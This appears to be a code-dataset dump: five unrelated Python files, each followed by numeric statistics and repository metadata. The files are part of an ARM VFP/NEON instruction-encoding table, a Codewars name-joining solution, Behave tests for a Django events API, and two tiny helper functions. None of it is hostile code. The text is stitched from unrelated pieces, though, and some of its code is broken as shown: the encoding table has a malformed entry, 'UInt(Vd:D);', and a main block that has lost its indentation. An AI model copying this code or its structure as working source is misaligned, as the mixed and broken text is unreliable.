('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 0, N, 0, M, 0, Vm),
('V<op><c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('V<op><c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 0, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('V<op><c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 0, F, N, 1, M, 0, Vm),
('V<op>L<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 0, N, 1, M, 0, Vm),
('VMOV<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, op, 1, imm4),
('VMOV<c>.F64 <Dd>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, imm4H, Vd, 1, 0, 1, sz, (0), 0, (0), 0, imm4L),
('VMOV<c> <Qd>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vm, Vd, 0, 0, 0, 1, M, Q, M, 1, Vm),
('VMOV<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 0, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VMOV<c>.<size> <Dd[x]>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, opc1, 0, Vd, Rt, 1, 0, 1, 1, D, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c>.<dt> <Rt>,<Dn[x]>', 1, 1, 1, 0, 1, 1, 1, 0, U, opc1, 1, Vn, Rt, 1, 0, 1, 1, N, opc2_2, 1, (0), (0), (0), (0)),
('VMOV<c> <Sn>,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, op, Vn, Rt, 1, 0, 1, 0, N, (0), (0), 1, (0), (0), (0), (0)),
('VMOV<c> <Sm>,<Sm1>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOV<c> <Dm>,<Rt>,<Rt2>', 1, 1, 1, 0, 1, 1, 0, 0, 0, 1, 0, op, Rt2, Rt, 1, 0, 1, 1, 0, 0, M, 1, Vm),
('VMOVL<c>.<dt> <Qd>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm3, 0, 0, 0, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VMOVN<c>.<dt> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, 0, 0, M, 0, Vm),
('VMRS<c> <Rt>,FPSCR', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 1, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMSR<c> FPSCR,<Rt>', 1, 1, 1, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0, 0, 1, Rt, 1, 0, 1, 0, (0), (0), (0), 1, (0), (0), (0), (0)),
('VMUL<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, op, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 1, N, Q, M, 1, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, op, 0, N, 0, M, 0, Vm),
('VMUL<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 1, Vm),
('VMUL<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 0, M, 0, Vm),
('VMUL<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 0, F, N, 1, M, 0, Vm),
('VMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 0, N, 1, M, 0, Vm),
('VMVN<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 1, 1, imm4),
('VMVN<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 0, 1, 1, Q, M, 0, Vm),
('VNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 1, Vd, 0, F, 1, 1, 1, Q, M, 0, Vm),
('VNEG<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 0, 1, M, 0, Vm),
('VNMLA<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 0, 1, Vn, Vd, 1, 0, 1, sz, N, op, M, 0, Vm),
('UInt(Vd:D);', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 0, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VORN<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 1, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VORR<c>.<dt> <Qd>,#<imm>', 1, 1, 1, i, 1, 1, 1, 1, 1, D, 0, 0, 0, imm3, Vd, cmode, 0, Q, 0, 1, imm4),
('VORR<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, 0, Vn, Vd, 0, 0, 0, 1, N, Q, M, 1, Vm),
('VPADAL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 0, op, Q, M, 0, Vm),
('VPADD<c>.<dt>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 1, Vm),
('VPADD<c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VPADDL<c>.<dt>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 1, 0, op, Q, M, 0, Vm),
('VP<op><c>.<dt>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 0, N, Q, M, op, Vm),
('VP<op><c>.F32', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, op, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 0, Vm),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPOP <list>', 1, 1, 1, 0, 1, 1, 0, 0, 1, D, 1, 1, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 1, imm8),
('VPUSH<c> <list>', 1, 1, 1, 0, 1, 1, 0, 1, 0, D, 1, 0, 1, 1, 0, 1, Vd, 1, 0, 1, 0, imm8),
('VQABS<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 0, Q, M, 0, Vm),
('VQADD<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 0, N, Q, M, 1, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, op, 1, N, 0, M, 0, Vm),
('VQD<op><c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, op, 1, 1, N, 1, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 0, N, 1, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 0, M, 0, Vm),
('VQDMULL<c>.<dt> <Qd>,<Dn>,<Dm[x]>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 0, 1, 1, N, 1, M, 0, Vm),
('VQMOV{U}N<c>.<type><size> <Dd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 0, op2, M, 0, Vm),
('VQNEG<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 1, 1, 1, 1, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 1, 1, N, Q, M, 0, Vm),
('VQRDMULH<c>.<dt> <Qd>,<Qn>,<Dm[x]>', 1, 1, 1, Q, 1, 1, 1, 1, 1, D, size, Vn, Vd, 1, 1, 0, 1, N, 1, M, 0, Vm),
('VQRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 1, Vm),
('VQRSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 1, M, 1, Vm),
('VQSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 1, Vm),
('VQSHL{U}<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 1, op, L, Q, M, 1, Vm),
('VQSHR{U}N<c>.<type><size> <Dd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, op, 0, 0, M, 1, Vm),
('VQSUB<c>.<type><size> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 1, 0, N, Q, M, 1, Vm),
('VRADDHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 0, 0, N, 0, M, 0, Vm),
('VRECPE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 0, Q, M, 0, Vm),
('VRECPS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 0, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VREV<n><c>.<size> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 0, 0, Vd, 0, 0, 0, op2, Q, M, 0, Vm),
('VRHADD<c> <Qd>,<Qn>,<Qm>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 0, 0, 1, N, Q, M, 0, Vm),
('VRSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 1, N, Q, M, 0, Vm),
('VRSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 0, L, Q, M, 1, Vm),
('VRSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 1, M, 1, Vm),
('VRSQRTE<c>.<dt> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 1, Vd, 0, 1, 0, F, 1, Q, M, 0, Vm),
('VRSQRTS<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 1, 1, N, Q, M, 1, Vm),
('VRSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 1, 1, L, Q, M, 1, Vm),
('VRSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSHL<c>.I<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSHL<c>.<type><size> <Qd>,<Qm>,<Qn>', 1, 1, 1, U, 1, 1, 1, 1, 0, D, size, Vn, Vd, 0, 1, 0, 0, N, Q, M, 0, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 1, 0, 0, 0, M, 1, Vm),
('VSHLL<c>.<type><size> <Qd>,<Dm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 1, 1, 0, 0, M, 0, Vm),
('VSHR<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 0, L, Q, M, 1, Vm),
('VSHRN<c>.I<size> <Dd>,<Qm>,#<imm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, imm6, Vd, 1, 0, 0, 0, 0, 0, M, 1, Vm),
('VSLI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 1, L, Q, M, 1, Vm),
('VSQRT<c>.F64 <Dd>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 1, D, 1, 1, 0, 0, 0, 1, Vd, 1, 0, 1, sz, 1, 1, M, 0, Vm),
('VSRA<c>.<type><size> <Qd>,<Qm>,#<imm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 0, 0, 1, L, Q, M, 1, Vm),
('VSRI<c>.<size> <Qd>,<Qm>,#<imm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, imm6, Vd, 0, 1, 0, 0, L, Q, M, 1, Vm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST1<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 0, index_align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST2<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 0, 1, index_align, Rm),
('VST3<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST3<c>.<size> <list>,[<Rn>]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 0, index_align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 0, D, 0, 0, Rn, Vd, type_, size, align, Rm),
('VST4<c>.<size> <list>,[<Rn>{:<align>}]{!}', 1, 1, 1, 1, 1, 0, 0, 1, 1, D, 0, 0, Rn, Vd, size, 1, 1, index_align, Rm),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTM{mode}<c> <Rn>{!},<list>', 1, 1, 1, 0, 1, 1, 0, P, U, D, W, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSTR<c> <Dd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 1, imm8),
('VSTR<c> <Sd>,[<Rn>{,#+/-<imm>}]', 1, 1, 1, 0, 1, 1, 0, 1, U, D, 0, 0, Rn, Vd, 1, 0, 1, 0, imm8),
('VSUB<c>.<dt> <Qd>,<Qn>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 0, Vm),
('VSUB<c>.F32 <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, 1, sz, Vn, Vd, 1, 1, 0, 1, N, Q, M, 0, Vm),
('VSUB<c>.F64 <Dd>,<Dn>,<Dm>', 1, 1, 1, 0, 1, 1, 1, 0, 0, D, 1, 1, Vn, Vd, 1, 0, 1, sz, N, 1, M, 0, Vm),
('VSUBHN<c>.<dt> <Dd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 1, 1, 0, N, 0, M, 0, Vm),
('VSUBL<c>.<dt> <Qd>,<Dn>,<Dm>', 1, 1, 1, U, 1, 1, 1, 1, 1, D, size, Vn, Vd, 0, 0, 1, op, N, 0, M, 0, Vm),
('VSWP<c> <Qd>,<Qm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 0, Q, M, 0, Vm),
('V<op><c>.8 <Dd>,<list>,<Dm>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, Vn, Vd, 1, 0, len_, N, op, M, 0, Vm),
('VTRN<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 0, 1, Q, M, 0, Vm),
('VTST<c>.<size> <Qd>,<Qn>,<Qm>', 1, 1, 1, 0, 1, 1, 1, 1, 0, D, size, Vn, Vd, 1, 0, 0, 0, N, Q, M, 1, Vm),
('VUZP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 0, Q, M, 0, Vm),
('VZIP<c>.<size>', 1, 1, 1, 1, 1, 1, 1, 1, 1, D, 1, 1, size, 1, 0, Vd, 0, 0, 0, 1, 1, Q, M, 0, Vm),
]
if __name__ == '__main__':
for description in (VFP_ARMv7 + VFP_Thumb):
instr = description[0]
bits = description[1:]
bits = [1 if type(x) == int else x.bitsize for x in bits]
if sum(bits) != 32:
print(instr, bits, sum(bits))
| 101.136709
| 132
| 0.395329
| 9,867
| 39,949
| 1.595014
| 0.022094
| 0.230271
| 0.201868
| 0.140552
| 0.940653
| 0.940399
| 0.939637
| 0.938366
| 0.937603
| 0.937095
| 0
| 0.18615
| 0.252472
| 39,949
| 394
| 133
| 101.393401
| 0.340857
| 0
| 0
| 0
| 0
| 0
| 0.248166
| 0.041002
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.007792
| 0
| 0.007792
| 0.002597
| 0
| 0
| 1
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
1d168df70c241bffc650db1634940f97996ff8f9
| 151
|
py
|
Python
|
8kyu/grasshopper_combine_strings.py
|
nhsz/codewars
|
82703959e910254d6feff4162f78c6dbd7a1c3ed
|
[
"MIT"
] | 1
|
2018-12-02T23:04:38.000Z
|
2018-12-02T23:04:38.000Z
|
8kyu/grasshopper_combine_strings.py
|
nhsz/codewars
|
82703959e910254d6feff4162f78c6dbd7a1c3ed
|
[
"MIT"
] | null | null | null |
8kyu/grasshopper_combine_strings.py
|
nhsz/codewars
|
82703959e910254d6feff4162f78c6dbd7a1c3ed
|
[
"MIT"
] | null | null | null |
# http://www.codewars.com/kata/55f73f66d160f1f1db000059/
def combine_names(first_name, last_name):
return "{0} {1}".format(first_name, last_name)
| 30.2
| 56
| 0.754967
| 21
| 151
| 5.190476
| 0.761905
| 0.165138
| 0.238532
| 0.311927
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138686
| 0.092715
| 151
| 4
| 57
| 37.75
| 0.656934
| 0.357616
| 0
| 0
| 0
| 0
| 0.073684
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1d4dd929550bf7b4692d9cb7d58e97e19856e8bd
| 3,618
|
py
|
Python
|
behave_tests/steps/get_events.py
|
Sindhuja-SRL/back-end
|
d84dae8ed212913339dec646b46a67fcc0b77f52
|
[
"MIT"
] | null | null | null |
behave_tests/steps/get_events.py
|
Sindhuja-SRL/back-end
|
d84dae8ed212913339dec646b46a67fcc0b77f52
|
[
"MIT"
] | null | null | null |
behave_tests/steps/get_events.py
|
Sindhuja-SRL/back-end
|
d84dae8ed212913339dec646b46a67fcc0b77f52
|
[
"MIT"
] | 1
|
2022-03-11T01:45:39.000Z
|
2022-03-11T01:45:39.000Z
|
from behave import *
import requests
from django.contrib.auth.models import User
from rest_framework.authtoken.models import Token
use_step_matcher("re")
@given("that I am a registered host of privilege walk events and exists events on my username")
def step_impl(context):
context.username = "12thMan"
context.password = "SomePassword123"
context.first_name = "12th"
context.last_name = "Man"
context.email = "twelve@testtamu.edu"
usr = User.objects.create_user(
context.username,
context.email,
context.password
)
usr.first_name = context.first_name
usr.last_name = context.last_name
usr.save()
registered_user = User.objects.filter(username="12thMan")
assert len(registered_user) == 1
user_auth_token, _ = Token.objects.get_or_create(user=usr)
context.key = user_auth_token.key
data = {
"name": "New year event",
"x_label_min": "Some text to be displayed on the graph",
"x_label_max": "Something else you want to be displayed on the graph",
}
headers = {
'Authorization':'Token '+ context.key
}
resp = requests.post(context.test.live_server_url + "/host/events/create/", data, headers=headers)
@when("I make an API call to the get events API with my correct username")
def step_impl(context):
headers = {
'Authorization':'Token '+ context.key
}
resp = requests.get(context.test.live_server_url + "/host/events/all/", headers=headers)
assert resp.status_code >= 200 and resp.status_code < 300
context.api_response_data = resp.json()
@then("I expect the response that gives the list of events on my username as host")
def step_impl(context):
assert context.api_response_data["events"][0]["name"] == "New year event"
@given("that I am a registered host of privilege walk events and there exists no events on my username")
def step_impl(context):
context.username = "12thMan"
context.password = "SomePassword123"
context.first_name = "12th"
context.last_name = "Man"
context.email = "twelve@testtamu.edu"
usr = User.objects.create_user(
context.username,
context.email,
context.password
)
usr.first_name = context.first_name
usr.last_name = context.last_name
usr.save()
registered_user = User.objects.filter(username="12thMan")
assert len(registered_user) == 1
user_auth_token, _ = Token.objects.get_or_create(user=usr)
context.key = user_auth_token.key
@when("I make an API call to the get events API with my username")
def step_impl(context):
headers = {
'Authorization':'Token '+ context.key
}
resp = requests.get(context.test.live_server_url + "/host/events/all/", headers=headers)
assert resp.status_code >= 200 and resp.status_code < 300
context.api_response_data = resp.json()
@then("I expect the response that gives the empty list as response")
def step_impl(context):
assert context.api_response_data["events"] == []
@given("that I am a registered host of privilege walk events and forgot my username")
def step_impl(context):
pass
@when("I make an API call to the get events API with wrong username")
def step_impl(context):
resp = requests.get(context.test.live_server_url + "/host/events/all/")
assert resp.status_code >= 400 and resp.status_code < 500
context.api_response_data = resp.json()
@then("I expect the response that says username doesn't exists")
def step_impl(context):
assert context.api_response_data["detail"] == "Authentication credentials were not provided."
| 29.900826
| 104
| 0.701216
| 508
| 3,618
| 4.848425
| 0.242126
| 0.025579
| 0.040195
| 0.065773
| 0.821356
| 0.8108
| 0.780755
| 0.747868
| 0.747868
| 0.729192
| 0
| 0.013356
| 0.192924
| 3,618
| 121
| 105
| 29.900826
| 0.830137
| 0
| 0
| 0.635294
| 0
| 0
| 0.297043
| 0
| 0
| 0
| 0
| 0
| 0.094118
| 1
| 0.105882
| false
| 0.058824
| 0.047059
| 0
| 0.152941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
1d576f6588eb1d2aae7c778d0ad217e3ca9a9ecd
| 35
|
py
|
Python
|
cog/__init__.py
|
uniphil/cog
|
deae32a3b06ee379fa44f68477ecfc00a2fc723d
|
[
"MIT"
] | 158
|
2018-07-09T02:46:54.000Z
|
2022-03-06T15:56:49.000Z
|
cog/__init__.py
|
uniphil/cog
|
deae32a3b06ee379fa44f68477ecfc00a2fc723d
|
[
"MIT"
] | 18
|
2018-07-12T14:59:01.000Z
|
2022-01-02T04:57:20.000Z
|
cog/__init__.py
|
uniphil/cog
|
deae32a3b06ee379fa44f68477ecfc00a2fc723d
|
[
"MIT"
] | 22
|
2019-01-31T14:57:39.000Z
|
2022-03-16T07:25:53.000Z
|
def cog():
return "Cog is alive."
| 11.666667
| 23
| 0.628571
| 6
| 35
| 3.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 35
| 2
| 24
| 17.5
| 0.785714
| 0
| 0
| 0
| 0
| 0
| 0.371429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d5539201acc74777191577d0a77d4057f6de4e8d
| 153
|
py
|
Python
|
graphgallery/utils/ipynb.py
|
EdisonLeeeee/GraphGallery
|
4eec9c5136bda14809bd22584b26cc346cdb633b
|
[
"MIT"
] | 300
|
2020-08-09T04:27:41.000Z
|
2022-03-30T07:43:41.000Z
|
graphgallery/utils/ipynb.py
|
EdisonLeeeee/GraphGallery
|
4eec9c5136bda14809bd22584b26cc346cdb633b
|
[
"MIT"
] | 5
|
2020-11-05T06:16:50.000Z
|
2021-12-11T05:05:22.000Z
|
graphgallery/utils/ipynb.py
|
EdisonLeeeee/GraphGallery
|
4eec9c5136bda14809bd22584b26cc346cdb633b
|
[
"MIT"
] | 51
|
2020-09-23T15:37:12.000Z
|
2022-03-05T01:28:56.000Z
|
from IPython import get_ipython
from IPython.display import display
def is_ipynb():
return type(get_ipython()).__module__.startswith('ipykernel.')
| 21.857143
| 66
| 0.784314
| 20
| 153
| 5.65
| 0.65
| 0.19469
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 153
| 6
| 67
| 25.5
| 0.837037
| 0
| 0
| 0
| 0
| 0
| 0.065359
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
